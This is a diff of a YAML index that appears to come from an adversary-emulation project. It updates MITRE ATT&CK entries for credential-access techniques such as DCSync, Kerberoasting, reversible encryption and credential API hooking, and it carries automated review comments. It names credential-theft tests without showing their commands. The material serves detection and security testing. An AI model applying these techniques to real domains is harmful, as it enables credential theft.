url: https://www.passcape.com/windows_password_recovery_vault_explorer
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.004
atomic_tests:
- name: Access Saved Credentials via VaultCmd
@@ -79818,29 +80547,7 @@ credential-access:
name: powershell
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -79861,6 +80568,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -79875,52 +80583,42 @@ credential-access:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1556.005:
+ technique:
+ modified: '2024-08-26T15:40:31.871Z'
name: Reversible Encryption
description: |-
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption
property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
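Review bot: this hunk is hard to review because the diff aligned the trailing keys of T1556.001 with the leading keys of T1556.005, so the `- T1556.005:` / `- technique:` removal and the `+ T1556.005:` / `+ technique:` re-addition bracket a mix of both objects' `external_references`. The net effect looks like a pure key reorder plus the `revoked: false` and spec-version changes seen elsewhere, but please re-check this region against the regenerated file directly (or with a patience or histogram diff) to confirm that `Dell Skeleton` and `TechNet Audit Policy` end up under T1556.001 and the four reversible-encryption references under T1556.005.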
@@ -79942,6 +80640,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor property changes in Group Policy: Computer
Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
Policy\\Store passwords using reversible encryption
. By default, the
@@ -79952,23 +80651,50 @@ credential-access:
Directory PowerShell modules, such as Set-ADUser
and Set-ADAccountControl
,
that change account configurations. \n\nMonitor Fine-Grained Password Policies
and regularly audit user accounts and group settings.(Citation: dump_pwd_dcsync)"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Command: Command Execution'
- 'User Account: User Account Metadata'
- 'Script: Script Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
+ created: '2022-01-13T20:02:28.349Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/005
+ external_id: T1556.005
+ - source_name: dump_pwd_dcsync
+ description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
+ All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
+ url: https://adsecurity.org/?p=2053
+ - source_name: store_pwd_rev_enc
+ description: Microsoft. (2021, October 28). Store passwords using reversible
+ encryption. Retrieved January 3, 2022.
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
+ - source_name: how_pwd_rev_enc_1
+ description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
+ encryption: how it works (part 1). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
+ - source_name: how_pwd_rev_enc_2
+ description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
+ encryption: how it works (part 2). Retrieved November 17, 2021.'
+ url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1111:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:37:20.612Z'
name: Multi-Factor Authentication Interception
description: "Adversaries may target multi-factor authentication (MFA) mechanisms,
(i.e., smart cards, token generators, etc.) to gain access to credentials
@@ -80039,9 +80765,8 @@ credential-access:
url: https://sec.okta.com/scatterswine
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1003.003:
technique:
@@ -80100,7 +80825,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.003
atomic_tests:
- name: Create Volume Shadow Copy with vssadmin
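Review bot: T1003.003 keeps `x_mitre_attack_spec_version: 3.1.0` as unchanged context while losing `spec_version: '2.1'`, leaving it on an older ATT&CK spec version than the objects that are bumped to `3.2.0` in this patch (T1557.002 similarly stays at `2.1.0`). If the upstream bundle is uniformly 3.2.0 this points at a stale object; if the upstream object genuinely was not updated, a note in the commit message explaining the mixed spec versions would save the next reviewer the same question.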
@@ -80399,7 +81123,7 @@ credential-access:
elevation_required: true
T1558.003:
technique:
- modified: '2023-03-30T21:01:46.538Z'
+ modified: '2024-09-23T22:20:10.994Z'
name: 'Steal or Forge Kerberos Tickets: Kerberoasting'
description: "Adversaries may abuse a valid Kerberos ticket-granting ticket
(TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket
@@ -80431,6 +81155,7 @@ credential-access:
phase_name: credential-access
x_mitre_contributors:
- Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4769, within a small
@@ -80440,7 +81165,6 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -80452,43 +81176,44 @@ credential-access:
id: attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee
created: '2020-02-11T18:43:38.588Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1558/003
external_id: T1558.003
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- source_name: Empire InvokeKerberoast Oct 2016
description: EmpireProject. (2016, October 31). Invoke-Kerberoast.ps1. Retrieved
March 22, 2018.
url: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
Domain. Retrieved March 22, 2018.
url: https://adsecurity.org/?p=2293
- - source_name: Microsoft Detecting Kerberoasting Feb 2018
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Microsoft SPN
- description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
- 2018.
- url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Microsoft SetSPN
description: Microsoft. (2010, April 13). Service Principal Names (SPNs) SetSPN
Syntax (Setspn.exe). Retrieved March 22, 2018.
url: https://social.technet.microsoft.com/wiki/contents/articles/717.service-principal-names-spns-setspn-syntax-setspn-exe.aspx
- - source_name: SANS Attacking Kerberos Nov 2014
- description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- url: https://redsiege.com/kerberoast-slides
+ - source_name: Microsoft SPN
+ description: Microsoft. (n.d.). Service Principal Names. Retrieved March 22,
+ 2018.
+ url: https://msdn.microsoft.com/library/ms677949.aspx
- source_name: Harmj0y Kerberoast Nov 2016
description: Schroeder, W. (2016, November 1). Kerberoasting Without Mimikatz.
- Retrieved March 23, 2018.
- url: https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/
+ Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/powershell/kerberoasting-without-mimikatz/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.003
atomic_tests:
- name: Request for service tickets
@@ -80693,70 +81418,7 @@ credential-access:
name: powershell
T1003.006:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ExtraHop
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
- type: attack-pattern
- created: '2020-02-11T18:45:34.293Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.006
- url: https://attack.mitre.org/techniques/T1003/006
- - url: https://msdn.microsoft.com/library/cc228086.aspx
- description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
- Service (DRS) Remote Protocol. Retrieved December 4, 2017.
- source_name: Microsoft DRSR Dec 2017
- - url: https://msdn.microsoft.com/library/dd207691.aspx
- description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
- 4, 2017.
- source_name: Microsoft GetNCCChanges
- - url: https://wiki.samba.org/index.php/DRSUAPI
- description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
- source_name: Samba DRSUAPI
- - url: https://source.winehq.org/WineAPI/samlib.html
- description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
- source_name: Wine API samlib.dll
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved August 7, 2017.
- source_name: ADSecurity Mimikatz DCSync
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved August 7, 2017.
- source_name: Harmj0y Mimikatz and DCSync
- - url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
- description: Warren, J. (2017, July 11). Manipulating User Passwords with
- Mimikatz. Retrieved December 4, 2017.
- source_name: InsiderThreat ChangeNTLM July 2017
- - url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
- description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
- August 7, 2017.
- source_name: GitHub Mimikatz lsadump Module
- - url: https://msdn.microsoft.com/library/cc237008.aspx
- description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
- Retrieved December 6, 2017.
- source_name: Microsoft NRPC Dec 2017
- - url: https://msdn.microsoft.com/library/cc245496.aspx
- description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
- Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
- source_name: Microsoft SAMR
- - url: https://adsecurity.org/?p=1729
- description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
- and Detection. Retrieved December 4, 2017.
- source_name: AdSecurity DCSync Sept 2015
- - url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
- description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
- Oh My. Retrieved December 4, 2017.
- source_name: Harmj0y DCSync Sept 2015
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:54:08.312Z'
name: 'OS Credential Dumping: DCSync'
description: |-
Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
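Review bot: the T1003.006 `external_references` list carries two pairs of entries that point at the same URL under different `source_name` values: `ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015` both at `https://adsecurity.org/?p=1729`, and `Harmj0y Mimikatz and DCSync` and `Harmj0y DCSync Sept 2015` both at the same harmj0y.net post. Both keys of each pair are cited by name in the description and detection text, so neither can simply be dropped; this is pre-existing upstream data and the reorder here does not change it, so it is not a blocker, just something to be aware of if someone later tries to deduplicate references by URL.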
@@ -80767,21 +81429,83 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - ExtraHop
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Access'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163
+ created: '2020-02-11T18:45:34.293Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/006
+ external_id: T1003.006
+ - source_name: GitHub Mimikatz lsadump Module
+ description: Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved
+ August 7, 2017.
+ url: https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump
+ - source_name: ADSecurity Mimikatz DCSync
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved August 7, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: AdSecurity DCSync Sept 2015
+ description: Metcalf, S. (2015, September 25). Mimikatz DCSync Usage, Exploitation,
+ and Detection. Retrieved December 4, 2017.
+ url: https://adsecurity.org/?p=1729
+ - source_name: Microsoft DRSR Dec 2017
+ description: Microsoft. (2017, December 1). MS-DRSR Directory Replication
+ Service (DRS) Remote Protocol. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc228086.aspx
+ - source_name: Microsoft NRPC Dec 2017
+ description: Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol.
+ Retrieved December 6, 2017.
+ url: https://msdn.microsoft.com/library/cc237008.aspx
+ - source_name: Microsoft GetNCCChanges
+ description: Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December
+ 4, 2017.
+ url: https://msdn.microsoft.com/library/dd207691.aspx
+ - source_name: Microsoft SAMR
+ description: Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote
+ Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.
+ url: https://msdn.microsoft.com/library/cc245496.aspx
+ - source_name: Samba DRSUAPI
+ description: SambaWiki. (n.d.). DRSUAPI. Retrieved December 4, 2017.
+ url: https://wiki.samba.org/index.php/DRSUAPI
+ - source_name: Harmj0y DCSync Sept 2015
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved December 4, 2017.
+ url: http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: Harmj0y Mimikatz and DCSync
+ description: Schroeder, W. (2015, September 22). Mimikatz and DCSync and ExtraSids,
+ Oh My. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
+ - source_name: InsiderThreat ChangeNTLM July 2017
+ description: Warren, J. (2017, July 11). Manipulating User Passwords with
+ Mimikatz. Retrieved December 4, 2017.
+ url: https://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM
+ - source_name: Wine API samlib.dll
+ description: Wine API. (n.d.). samlib.dll. Retrieved December 4, 2017.
+ url: https://source.winehq.org/WineAPI/samlib.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.006
atomic_tests:
- name: DCSync (Active Directory)
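Review bot: the rebuilt `external_references` for T1003.006 now carries two pairs of duplicate sources: `ADSecurity Mimikatz DCSync` and `AdSecurity DCSync Sept 2015` both resolve to https://adsecurity.org/?p=1729, and `Harmj0y DCSync Sept 2015` (http://www.harmj0y.net/...) and `Harmj0y Mimikatz and DCSync` (https://blog.harmj0y.net/...) are the same post under two hostnames. If the generator is meant to mirror upstream verbatim this is expected, but otherwise one key per URL is enough, and the detection text only ever cites `AdSecurity DCSync Sept 2015` and `Harmj0y DCSync Sept 2015`. Separately, this hunk drops `spec_version: '2.1'` and `x_mitre_permissions_required: Administrator` with no replacement, and the same `spec_version` removal repeats for every technique object in this patch; `spec_version` is a required property on STIX 2.1 objects, so please state in the commit message whether the source bundle changed format or the field was stripped deliberately, since any consumer validating these objects as STIX 2.1 will now reject them.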
@@ -80861,7 +81585,7 @@ credential-access:
elevation_required: false
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -80874,6 +81598,7 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -80910,17 +81635,17 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
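Review bot: the platform rename at `- Azure AD` / `- Google Workspace` / `- Office 365` to `- Office Suite` / `- Identity Provider` removes the old strings from the object entirely, so anything that selects techniques by platform name (per-platform index files, docs filters) will silently return nothing for T1556 until it is taught the new names. The same rename is applied to T1069 and T1069.003 further down, so the index generator and any platform-keyed output should be regenerated in this same change rather than left to a follow-up.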
@@ -80966,81 +81691,10 @@ credential-access:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1056.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6
- type: attack-pattern
- created: '2020-02-11T19:01:15.930Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1056.004
- url: https://attack.mitre.org/techniques/T1056/004
- - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
- description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
- Retrieved December 18, 2017.
- url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
- - url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
- description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
- source_name: Microsoft Hook Overview
- - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
- A Technical Survey Of Common And Trending Process Injection Techniques.
- Retrieved December 7, 2017.'
- source_name: Elastic Process Injection July 2017
- - url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
- description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
- Retrieved December 12, 2017.'
- source_name: Adlice Software IAT Hooks Oct 2014
- - url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
- description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
- Mode. Retrieved December 20, 2017.'
- source_name: MWRInfoSecurity Dynamic Hooking 2015
- - url: https://www.exploit-db.com/docs/17802.pdf
- description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
- December 12, 2017.
- source_name: HighTech Bridge Inline Hooking Sept 2011
- - url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
- description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
- Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
- source_name: Volatility Detecting Hooks Sept 2012
- - url: https://github.com/prekageo/winhook
- description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
- source_name: PreKageo Winhook Jul 2011
- - url: https://github.com/jay/gethooks
- description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
- 12, 2017.
- source_name: Jay GetHooks Sept 2011
- - url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
- description: Felici, M. (2006, December 6). Any application-defined hook procedure
- on my machine?. Retrieved December 12, 2017.
- source_name: Zairon Hooking Dec 2006
- - url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
- description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
- against user-land. Retrieved December 12, 2017.'
- source_name: EyeofRa Detecting Hooking June 2017
- - url: http://www.gmer.net/
- description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
- source_name: GMER Rootkits
- - url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
- description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
- December 12, 2017.
- source_name: Microsoft Process Snapshot
- - url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
- description: Stack Exchange - Security. (2012, July 31). What are the methods
- to find hooked functions and APIs?. Retrieved December 12, 2017.
- source_name: StackExchange Hooks Jul 2012
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-27T21:03:56.385Z'
name: 'Input Capture: Credential API Hooking'
description: |
Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
@@ -81053,23 +81707,89 @@ credential-access:
phase_name: collection
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: |-
